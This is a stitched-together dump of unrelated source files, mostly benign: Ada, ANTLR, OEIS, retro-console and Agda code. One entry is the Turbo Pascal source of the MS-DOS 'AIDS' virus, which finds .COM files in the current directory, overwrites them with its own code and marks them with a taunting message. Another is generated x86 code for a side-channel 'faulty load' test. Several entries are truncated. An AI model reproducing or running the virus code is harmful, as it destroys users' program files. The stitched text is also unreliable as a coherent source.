STR$(x) ; ; Examples: ; ; v$ = STR$(b@) v$ = STR$(a!) v$ = STR$(x#) ; \| \| \| ; B$STCY B$STR4 B$STR8 ; ; ; INCLUDE switch.inc INCLUDE rmacros.inc useSeg _DATA USESEG _BSS useSeg ST_TEXT INCLUDE seg.inc INCLUDE rtps.inc INCLUDE baslibma.inc sBegin ST_TEXT ASSUMES CS,ST_TEXT externNP B$FloatCONASC ;Pull in floating point conversion routines externNP B$STR_COMMON ;Common support for STR$ SUBTTL STR$ - Create String from number PAGE ;* ;B$STR4, B$STR8, B$STCY - STR$ function support ; ;Purpose: ; Runtime Entry Points ; Create a string representing the number in ASCII ; ;Entry: ; parameter value is on the stack (R4, R8 or CY) ; ;Exit: ; AX = Address of string descriptor ; ;Uses: ; Per Convention ; ;Exceptions: ; Out of memory ;**** cProc B$STR4,<PUBLIC,FAR> parmD arg4 cBegin MOV AL,VT_R4 LEA BX,arg4 cCall B$STR_COMMON cEnd cProc B$STR8,<PUBLIC,FAR> ParmQ R8Arg cBegin MOV AL,VT_R8 ;AL = data type LEA BX,R8Arg ;BX = ptr to data cCall B$STR_COMMON ;call common routine to convert cEnd sEND ST_TEXT END
src/main/java/org/tros/logo/antlr/Logo.g4	ZenHarbinger/torgo	8	5337	/* BSD License Copyright (c) 2013, <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of <NAME> nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / grammar Logo; @parser::header { package org.tros.logo.antlr; } @lexer::header { package org.tros.logo.antlr; } /--Added lone line detection--/ prog : line \| (line? EOL)+ line? ; /--Added EOL--/ line : cmd+ comment? \| comment \| print_command comment? \| procedureDeclaration \| EOL ; cmd : repeat \| fd \| bk \| rt \| lt \| cs \| pu \| pd \| ht \| st \| home \| setxy \| make \| localmake \| procedureInvocation \| ife \| stop \| fore \| pc \| cc \| pause \| ds \| fontsize \| fontstyle \| fontname /-- print_command was not originally here, so could not print_command in if/repeat blocks--/ \| print_command ; procedureInvocation : name expression ; procedureDeclaration : 'to' name parameterDeclarations* EOL? (line? EOL)+ 'end' ; parameterDeclarations : ':' name (',' parameterDeclarations)* ; func : random \| repcount \| getangle \| getx \| gety ; /--made it so that repeating can use an expression--/ repeat : 'repeat' expression block ; /--Would like to make this be multi-line--/ block : '[' line+ ']' ; ife : 'if' comparison block ; comparison : expression comparisonOperator expression ; /--added more compare operators--/ comparisonOperator : '<' \| '>' \| '=' \| '!' \| '<=' \| '>=' \| '==' \| '!=' \| '<>' ; make : 'make' STRINGLITERAL value ; localmake : 'localmake' STRINGLITERAL value ; print_command : 'print' (value \| quotedstring) ; quotedstring : '[' (quotedstring \| ~']')* ']' ; name : STRING ; /--expression also contains deref, so deref here is unnecessary--/ value : STRINGLITERAL \| expression \| deref ; /--Added parenthesis for better order of operations control--/ parenExpression : '(' expression ')' ; signExpression : ('+'\|'-')? (number \| deref \| func \| parenExpression) ; /--Added Power/Exponential Expression--/ powerExpression : signExpression ('^' signExpression)? ; /--Added Integer Divsion Symbol and Modulo--/ multiplyingExpression : powerExpression (('' \| '/' \| '\\' \| '%') powerExpression) ; expression : multiplyingExpression (('+'\|'-') multiplyingExpression)* ; deref : ':' name ; fd : ('fd' \| 'forward') expression ; bk : ('bk' \| 'backward' \| 'back') expression ; rt : ('rt' \| 'right') expression ; lt : ('lt' \| 'left') expression ; cs : 'cs' \| 'clearscreen' \| 'cls' \| 'clear' ; pu : 'pu' \| 'penup' ; pd : 'pd' \| 'pendown' ; ht : 'ht' \| 'hideturtle' ; st : 'st' \| 'showturtle' ; home : 'home' ; stop : 'stop' ; setxy : 'setxy' expression expression ; random : 'random' expression ; getangle : 'getangle' ; getx : 'getx' ; gety : 'gety' ; /--This value will tell you which repeat value you are on inside the innermost repeat loop.--/ /--This value starts at 1.--/ /--If you are not in a repeat loop, it will evaluate to 0.--/ repcount : 'repcount' ; /* --modified to make the step optional-- / fore : 'for' '[' name expression expression expression? ']' block ; / --custom-- / / --change pen color-- / pc : ('pc' \| 'pencolor') (name \| expression expression expression expression? \| hexcolor) ; / --change canvas color-- / cc : ('cc' \| 'canvascolor') (name \| expression expression expression \| hexcolor) ; hexcolor : '#'HEX ; HEX : [0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F] ; / --pause-- / pause : 'pause' expression ; / --draw a string to the canvas-- / ds : ('ds'\|'drawstring' \| 'label') value ; fontname : 'fontname' name ; fontsize : 'fontsize' expression ; fontstyle : 'fontstyle' style ; style : 'bold' \| 'plain' \| 'italic' \| 'bold_italic' ; number : NUMBER ; comment : COMMENT ; STRINGLITERAL : '"' STRING ; STRING : [a-zA-Z] [a-zA-Z0-9_] ; NUMBER : [0-9]+ ('.'[0-9]+)? ; COMMENT : ';' ~[\r\n]* ; EOL : '\r'? '\n' ; WS : [ \t\r\n]->skip ;
test/high_low_xmm.asm	killvxk/AssemblyLine	147	15357	SECTION .TEXT GLOBAL TEST TEST: mov r9, 0x11111111 mov r10, 0x22222222 movq xmm0, r9 movq xmm1, r10 punpcklqdq xmm0, xmm1 psrldq xmm0, 8 psrldq xmm15, 8 movq rax, xmm0 ret
MSDOS/Virus.MSDOS.Unknown.vir2.asm	fengjixuchui/Family	3	29320	{ Beginning of source code, Turbo Pascal 3.01a } {C-} {U-} {I-} { Wont allow a user break, enable IO check } { -- Constants --------------------------------------- } Const VirusSize = 13847; { AIDSYs code size } Warning :String[42] { Warning message } = ZThis File Has Been Infected By AIDS! HaHa!Y; { -- Type declarations------------------------------------- } Type DTARec =Record { Data area for file search } DOSnext :Array[1..21] of Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: Array[1..13] of Char; End; Registers = Record {Register set used for file search } Case Byte of 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; { -- Variables--------------------------------------------- } Var { Memory offset program code } ProgramStart : Byte absolute Cseg:$100; { Infected marker } MarkInfected : String[42] absolute Cseg:$180; Reg : Registers; { Register set } DTA : DTARec; { Data area } Buffer : Array[Byte] of Byte; { Data buffer } TestID : String[42]; { To recognize infected files } UsePath : String[66]; { Path to search files } { Lenght of search path } UsePathLenght: Byte absolute UsePath; Go : File; { File to infect } B : Byte; { Used } LoopVar : Integer; {Will loop forever} { -- Program code------------------------------------------ } Begin GetDir(0, UsePath); { get current directory } if Pos(Z\Y, UsePath) <> UsePathLenght then UsePath := UsePath + Z\Y; UsePath := UsePath + Z*.COMY; { Define search mask } Reg.AH := $1A; { Set data area } Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg.CX := $ff; { Set attribute to find ALL files } MsDos(Reg); { Find first matching entry } IF not Odd(Reg.Flags) Then { If a file found then } Repeat UsePath := DTA.FullName; B := Pos(#0, UsePath); If B > 0 then Delete(UsePath, B, 255); { Remove garbage } Assign(Go, UsePath); Reset(Go); If IOresult = 0 Then { If not IO error then } Begin BlockRead(Go, Buffer, 2); Move(Buffer[$80], TestID, 43); { Test if file already ill(Infected) } If TestID <> Warning Then { If not then ... } Begin Seek (Go, 0); { Mark file as infected and .. } MarkInfected := Warning; { Infect it } BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); Close(Go); Halt; {.. and halt the program } End; Close(Go); End; { The file has already been infected, search next. } Reg.AH := $4F; Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); { ......................Until no more files are found } Until Odd(Reg.Flags); Loopvar:=Random(10); If Loopvar=7 then begin Writeln(Z Y); {Give a lot of smiles} Writeln(ZY); Writeln(Z Y); Writeln(Z ATTENTION: Y); Writeln(Z I have been elected to inform you that throughout your process of Y); Writeln(Z collecting and executing files, you have accidentally H
source/asis/spec/ada-command_line.ads	faelys/gela-asis	4	21082	<filename>source/asis/spec/ada-command_line.ads<gh_stars>1-10 ------------------------------------------------------------------------------ -- A d a r u n - t i m e s p e c i f i c a t i o n -- -- ASIS implementation for Gela project, a portable Ada compiler -- -- http://gela.ada-ru.org -- -- - - - - - - - - - - - - - - - -- -- Read copyright and license at the end of ada.ads file -- ------------------------------------------------------------------------------ -- $Revision: 209 $ $Date: 2013-11-30 21:03:24 +0200 (Сб., 30 нояб. 2013) $ package Ada.Command_Line is pragma Preelaborate (Command_Line); function Argument_Count return Natural; function Argument (Number : in Positive) return String; function Command_Name return String; type Exit_Status is range implementation-defined .. implementation-defined; Success : constant Exit_Status; Failure : constant Exit_Status; procedure Set_Exit_Status (Code : in Exit_Status); private pragma Import (Ada, Success); pragma Import (Ada, Failure); end Ada.Command_Line;
Validation/pyFrame3DD-master/gcc-master/gcc/ada/libgnarl/s-mudido.adb	djamal2727/Main-Bearing-Analytical-Model	0	16210	------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- SYSTEM.MULTIPROCESSORS.DISPATCHING_DOMAINS -- -- -- -- B o d y -- -- -- -- Copyright (C) 2011-2020, Free Software Foundation, Inc. -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. -- -- Extensive contributions were provided by Ada Core Technologies, Inc. -- -- -- ------------------------------------------------------------------------------ -- Body used on unimplemented targets, where the operating system does not -- support setting task affinities. package body System.Multiprocessors.Dispatching_Domains is ----------------------- -- Local subprograms -- ----------------------- procedure Freeze_Dispatching_Domains; pragma Export (Ada, Freeze_Dispatching_Domains, "__gnat_freeze_dispatching_domains"); -- Signal the time when no new dispatching domains can be created. It -- should be called before the environment task calls the main procedure -- (and after the elaboration code), so the binder-generated file needs to -- import and call this procedure. ----------------- -- Assign_Task -- ----------------- procedure Assign_Task (Domain : in out Dispatching_Domain; CPU : CPU_Range := Not_A_Specific_CPU; T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) is pragma Unreferenced (Domain, CPU, T); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Assign_Task; ------------ -- Create -- ------------ function Create (First : CPU; Last : CPU_Range) return Dispatching_Domain is pragma Unreferenced (First, Last); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Create; function Create (Set : CPU_Set) return Dispatching_Domain is pragma Unreferenced (Set); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Create; ----------------------------- -- Delay_Until_And_Set_CPU -- ----------------------------- procedure Delay_Until_And_Set_CPU (Delay_Until_Time : Ada.Real_Time.Time; CPU : CPU_Range) is pragma Unreferenced (Delay_Until_Time, CPU); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Delay_Until_And_Set_CPU; -------------------------------- -- Freeze_Dispatching_Domains -- -------------------------------- procedure Freeze_Dispatching_Domains is begin null; end Freeze_Dispatching_Domains; ------------- -- Get_CPU -- ------------- function Get_CPU (T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) return CPU_Range is pragma Unreferenced (T); begin return Not_A_Specific_CPU; end Get_CPU; ----------------- -- Get_CPU_Set -- ----------------- function Get_CPU_Set (Domain : Dispatching_Domain) return CPU_Set is pragma Unreferenced (Domain); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Get_CPU_Set; ---------------------------- -- Get_Dispatching_Domain -- ---------------------------- function Get_Dispatching_Domain (T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) return Dispatching_Domain is pragma Unreferenced (T); begin return System_Dispatching_Domain; end Get_Dispatching_Domain; ------------------- -- Get_First_CPU -- ------------------- function Get_First_CPU (Domain : Dispatching_Domain) return CPU is pragma Unreferenced (Domain); begin return CPU'First; end Get_First_CPU; ------------------ -- Get_Last_CPU -- ------------------ function Get_Last_CPU (Domain : Dispatching_Domain) return CPU_Range is pragma Unreferenced (Domain); begin return Number_Of_CPUs; end Get_Last_CPU; ------------- -- Set_CPU -- ------------- procedure Set_CPU (CPU : CPU_Range; T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) is pragma Unreferenced (CPU, T); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Set_CPU; end System.Multiprocessors.Dispatching_Domains;
programs/oeis/063/A063102.asm	karttu/loda	1	100221	; A063102: Dimension of the space of weight 2n cusp forms for Gamma_0( 34 ). ; 3,12,20,30,38,48,56,66,74,84,92,102,110,120,128,138,146,156,164,174,182,192,200,210,218,228,236,246,254,264,272,282,290,300,308,318,326,336,344,354,362,372,380,390,398,408,416,426,434,444 mul $0,9 add $0,1 div $0,2 mov $1,1 sub $1,$0 trn $0,$1 mov $1,$0 add $1,3
libsrc/_DEVELOPMENT/math/integer/small/l_small_mul_72_64x8.asm	jpoikela/z88dk	640	9060	SECTION code_clib SECTION code_math PUBLIC l_small_mul_72_64x8 EXTERN l_small_mul_40_32x8 l_small_mul_72_64x8: ; multiplication of a 64-bit number and an 8-bit number into 72-bit result ; ; enter : dehl'dehl = 64-bit multiplicand ; a = 8-bit multiplicand ; ; exit : a dehl'dehl = 72-bit product ; carry reset ; ; uses : af, bc, de, hl, bc', de', hl' exx push de push hl ; save MS32 push af ; save M8 exx call l_small_mul_40_32x8 ; adehl = LS32 * M8 ld c,a ld b,0 exx pop af ; a = M8 pop hl pop de ; dehl = MS32 exx push de push hl push bc ; save LS32 * M8 exx call l_small_mul_40_32x8 ; adehl = MS32 * M8 pop bc add hl,bc jr nc, no_propagate inc e jr nz, no_propagate inc d jr nz, no_propagate inc a no_propagate: exx pop hl pop de ; a dehl'dehl = 72-bit product or a ret
src/drawCode/mmRender.asm	Gip-Gip/VePseu	5	9545	<reponame>Gip-Gip/VePseu ; Render the minimap mmRender: SUBROUTINE LDA #NULL ; Set the colour of the player LDA #PLYRCOLU STA COLUPF ; Set the colour of the map LDA #MAPCOLU STA COLUP0 STA COLUP1 ; Get the player's position and translate it into horizontal movement LDA #%00001000 CLC SEC SBC playerPos ASL ASL ASL ASL STA HMBL ; Set the map's position to the right values LDA #HADJ_A STA HMP0 LDA #HADJ_B STA HMP1 STA WSYNC LDX #HWAIT .wait1: DEX BNE .wait1 DELAY HDELAY1 STA RESP0 STA RESP1 LDA playerPos STA WSYNC LDX #HWAIT .wait2: DEX BNE .wait2 DELAY HDELAY2 STA RESBL

Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_1_1260.asm

ljhsiun2/medusa

9

16898

.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r15 push %r8 push %rbp push %rcx push %rdi push %rsi lea addresses_normal_ht+0x412b, %r15 nop nop nop nop nop cmp %r11, %r11 mov $0x6162636465666768, %r14 movq %r14, (%r15) nop nop nop add $47935, %r8 lea addresses_normal_ht+0x153e4, %rsi lea addresses_WT_ht+0x727, %rdi nop nop nop cmp %rbp, %rbp mov $80, %rcx rep movsw nop nop nop nop nop xor %r8, %r8 lea addresses_A_ht+0x8857, %r15 nop nop dec %rdi mov (%r15), %r11w nop nop nop nop dec %rbp lea addresses_WT_ht+0x1ce17, %rsi lea addresses_UC_ht+0x1427, %rdi clflush (%rdi) nop add $41785, %r8 mov $23, %rcx rep movsl sub $27866, %r14 lea addresses_normal_ht+0x11008, %rsi lea addresses_D_ht+0x1b5a, %rdi nop nop nop sub $20527, %r8 mov $74, %rcx rep movsq nop nop nop nop nop xor %rbp, %rbp lea addresses_D_ht+0x9627, %rbp nop nop nop nop nop cmp $63361, %rsi movb $0x61, (%rbp) nop nop nop nop sub $49555, %r15 lea addresses_D_ht+0x1efa7, %rsi lea addresses_UC_ht+0x19a27, %rdi nop nop nop nop add $9625, %r15 mov $98, %rcx rep movsw nop nop nop xor $60328, %r11 lea addresses_A_ht+0x17daf, %rsi nop nop nop nop nop cmp $37316, %r14 movb $0x61, (%rsi) nop nop nop nop nop xor $49862, %r11 lea addresses_A_ht+0x1003f, %r15 add %rsi, %rsi movb $0x61, (%r15) nop nop add $7232, %rdi pop %rsi pop %rdi pop %rcx pop %rbp pop %r8 pop %r15 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r11 push %r12 push %r13 push %r14 push %r15 push %rbp push %rdi // Store lea addresses_D+0x8a17, %r14 nop nop nop nop and %rdi, %rdi mov $0x5152535455565758, %r11 movq %r11, %xmm2 vmovups %ymm2, (%r14) nop nop nop nop nop sub %r12, %r12 // Store lea addresses_UC+0x1f1ff, %rdi nop nop inc %rbp movb $0x51, (%rdi) // Exception!!! nop nop mov (0), %rdi nop sub $8346, %r13 // Store lea addresses_A+0x1dda3, %rdi nop inc %r15 mov $0x5152535455565758, %rbp movq %rbp, (%rdi) nop nop nop sub $49741, %r11 // Load lea addresses_D+0x166d4, %rbp clflush (%rbp) nop nop inc %r11 mov (%rbp), %r13 nop dec %r14 // Store lea addresses_WT+0x2557, %r14 nop nop nop nop xor $50496, %r13 movb $0x51, (%r14) cmp %rdi, %rdi // Store lea addresses_A+0x1de27, %rbp nop add %r14, %r14 movl $0x51525354, (%rbp) nop dec %r11 // Faulty Load lea addresses_A+0x1de27, %r15 cmp %r13, %r13 mov (%r15), %r14w lea oracles, %r13 and $0xff, %r14 shlq $12, %r14 mov (%r13,%r14,1), %r14 pop %rdi pop %rbp pop %r15 pop %r14 pop %r13 pop %r12 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_D', 'same': False, 'size': 32, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_UC', 'same': False, 'size': 1, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A', 'same': False, 'size': 8, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_D', 'same': False, 'size': 8, 'congruent': 0, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WT', 'same': False, 'size': 1, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A', 'same': True, 'size': 4, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_A', 'same': True, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'dst': {'type': 'addresses_normal_ht', 'same': False, 'size': 8, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_A_ht', 'same': False, 'size': 2, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 1, 'congruent': 11, 'NT': False, 'AVXalign': True}, 'OP': 'STOR'} {'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': True}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 1, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 1, 'congruent': 3, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'} {'54': 1} 54 */

init.asm

adkennan/BurgerMayhem

0

169769

INIT_SYSTEM lda #GS_TITLE sta G_GAME_STATE jsr FADE_OUT jsr CLEAR_SCREEN sei ; Disable Kernal and Basic ROM lda #CPUPORT_VAL sta CPUPORT ; Set up our own interrupt handler lda #<IRQ sta NMISR sta ISR lda #>IRQ sta NMISR sta ISR ; Clear CIA timers lda #DXICR_CLEAR sta D1ICR sta D2ICR lda D1ICR lda D2ICR cli ; Hide border garbage lda #$FF sta BORDER_PAT_LOC ; Switch to video bank 1 lda #D2PRA_BANK1 sta D2PRA rts IRQ rti

gdb/testsuite/gdb.ada/scalar_storage/storage.adb

greyblue9/binutils-gdb

1

3164

-- Copyright 2019-2021 Free Software Foundation, Inc. -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 3 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program. If not, see <http://www.gnu.org/licenses/>. with Pck; use Pck; with System.Storage_Elements; use System.Storage_Elements; procedure Storage is subtype Some_Range is Natural range 0..127; subtype Another_Range is Natural range 0..15; type Rec is record Value : Some_Range; Another_Value : Another_Range; end record; for Rec use record Value at 0 range 0..6; Another_Value at 0 range 7..10; end record; type Rec_LE is new Rec; for Rec_LE'Bit_Order use System.Low_Order_First; for Rec_LE'Scalar_Storage_Order use System.Low_Order_First; type Rec_BE is new Rec; for Rec_BE'Bit_Order use System.High_Order_First; for Rec_BE'Scalar_Storage_Order use System.High_Order_First; V_LE : Rec_LE; V_BE : Rec_BE; begin V_LE := (126, 12); V_BE := (126, 12); Do_Nothing (V_LE'Address); -- START Do_Nothing (V_BE'Address); end Storage;

programs/oeis/080/A080923.asm

neoneye/loda

22

177703

; A080923: First differences of A003946. ; 1,3,8,24,72,216,648,1944,5832,17496,52488,157464,472392,1417176,4251528,12754584,38263752,114791256,344373768,1033121304,3099363912,9298091736,27894275208,83682825624,251048476872,753145430616,2259436291848,6778308875544,20334926626632,61004779879896,183014339639688,549043018919064,1647129056757192,4941387170271576,14824161510814728,44472484532444184,133417453597332552,400252360791997656,1200757082375992968,3602271247127978904,10806813741383936712,32420441224151810136,97261323672455430408,291783971017366291224,875351913052098873672,2626055739156296621016,7878167217468889863048,23634501652406669589144,70903504957220008767432,212710514871660026302296,638131544614980078906888,1914394633844940236720664,5743183901534820710161992,17229551704604462130485976,51688655113813386391457928,155065965341440159174373784,465197896024320477523121352,1395593688072961432569364056,4186781064218884297708092168,12560343192656652893124276504,37681029577969958679372829512,113043088733909876038118488536,339129266201729628114355465608,1017387798605188884343066396824,3052163395815566653029199190472,9156490187446699959087597571416,27469470562340099877262792714248,82408411687020299631788378142744,247225235061060898895365134428232,741675705183182696686095403284696,2225027115549548090058286209854088,6675081346648644270174858629562264,20025244039945932810524575888686792,60075732119837798431573727666060376,180227196359513395294721182998181128,540681589078540185884163548994543384 mov $1,3 pow $1,$0 mul $1,8 div $1,3 sub $1,1 div $1,3 add $1,1 mov $0,$1

libsrc/_DEVELOPMENT/adt/b_vector/c/sccz80/b_vector_at.asm

meesokim/z88dk

0

81130

; int b_vector_at(b_vector_t *v, size_t idx) SECTION code_adt_b_vector PUBLIC b_vector_at EXTERN b_array_at defc b_vector_at = b_array_at

src/sound/alarm_musics/alarm_one/channel3.asm

Gegel85/RunnerGB

0

1496

musicChan3AlarmOneTheme:: repeat 4 setRegisters $80, $00, $00, $AC, $85 stopMusic continue .loop: wait 0 jump .loop

generated/simple_webapps-commands-append_servers-server_hash.adb

faelys/simple-webapps

1

17976

<filename>generated/simple_webapps-commands-append_servers-server_hash.adb<gh_stars>1-10 with Interfaces; use Interfaces; package body Simple_Webapps.Commands.Append_Servers.Server_Hash is P : constant array (0 .. 1) of Natural := (1, 11); T1 : constant array (0 .. 1) of Unsigned_8 := (10, 12); T2 : constant array (0 .. 1) of Unsigned_8 := (15, 5); G : constant array (0 .. 15) of Unsigned_8 := (0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 3, 4, 0, 4, 0); function Hash (S : String) return Natural is F : constant Natural := S'First - 1; L : constant Natural := S'Length; F1, F2 : Natural := 0; J : Natural; begin for K in P'Range loop exit when L < P (K); J := Character'Pos (S (P (K) + F)); F1 := (F1 + Natural (T1 (K)) * J) mod 16; F2 := (F2 + Natural (T2 (K)) * J) mod 16; end loop; return (Natural (G (F1)) + Natural (G (F2))) mod 7; end Hash; end Simple_Webapps.Commands.Append_Servers.Server_Hash;

programs/oeis/234/A234046.asm

jmorken/loda

1

87936

; A234046: Period 7: repeat [0, 1, -1, 0, 0, -1, 1]. ; 0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1 lpb $0 sub $0,7 lpe pow $0,2 lpb $0 div $0,9 sub $0,1 lpe mov $1,$0

src/test/java/com/anqiansong/Antlr.g4

anqiansong/CommentShell

8

2385

grammar Antlr; //x:generate echo hello g4

alloy4fun_models/trashltl/models/19/5NdBmFo62S4zckgT4.als

Kaixi26/org.alloytools.alloy

0

3425

<gh_stars>0 open main pred id5NdBmFo62S4zckgT4_prop20 { always all t: File | t not in Protected since t in Trash } pred __repair { id5NdBmFo62S4zckgT4_prop20 } check __repair { id5NdBmFo62S4zckgT4_prop20 <=> prop20o }

programs/oeis/211/A211322.asm

jmorken/loda

1

163698

; A211322: Number of (n+1) X (n+1) -3..3 symmetric matrices with every 2 X 2 subblock having sum zero and one or two distinct values. ; 11,15,21,31,47,73,115,183,293,471,759,1225,1979,3199,5173,8367,13535,21897,35427,57319,92741,150055,242791,392841,635627,1028463,1664085,2692543,4356623,7049161,11405779,18454935,29860709,48315639,78176343,126491977,204668315,331160287,535828597,866988879,1402817471,2269806345,3672623811,5942430151,9615053957,15557484103,25172538055,40730022153,65902560203,106632582351,172535142549,279167724895,451702867439,730870592329,1182573459763,1913444052087,3096017511845,5009461563927,8105479075767,13114940639689,21220419715451,34335360355135,55555780070581,89891140425711,145446920496287,235338060921993,380784981418275,616123042340263,996908023758533,1613031066098791,2609939089857319,4222970155956105,6832909245813419 mov $1,6 mov $2,4 lpb $0 sub $0,1 mov $3,$2 mov $2,$1 add $1,$3 lpe add $1,5

RefactorAgdaEngine/Test/Tests/input/ExtractCaseSplit.agda

omega12345/RefactorAgda

5

13648

module ExtractCaseSplit where open import Data.Maybe open import Agda.Builtin.Bool not : Bool -> Bool not true = false not false = true func : Maybe Bool -> Bool func nothing = false func (just x) = not x open import Data.List func2 : List Bool -> Bool func2 [] = true func2 (x ∷ x₁) = not (func2 x₁)

programs/oeis/088/A088227.asm

neoneye/loda

22

25501

; A088227: Solutions x to x^n == 7 mod 13. ; 2,6,7,11,15,19,20,24,28,32,33,37,41,45,46,50,54,58,59,63,67,71,72,76,80,84,85,89,93,97,98,102,106,110,111,115,119,123,124,128,132,136,137,141,145,149,150,154,158,162,163,167,171,175,176,180,184,188,189,193 mov $1,$0 add $1,2 div $1,4 sub $1,$0 sub $0,$1 mov $2,$1 mul $2,2 sub $2,$0 mov $0,2 sub $0,$2

OldBasicILP/Syntax/Translation.agda

mietek/hilbert-gentzen

29

1814

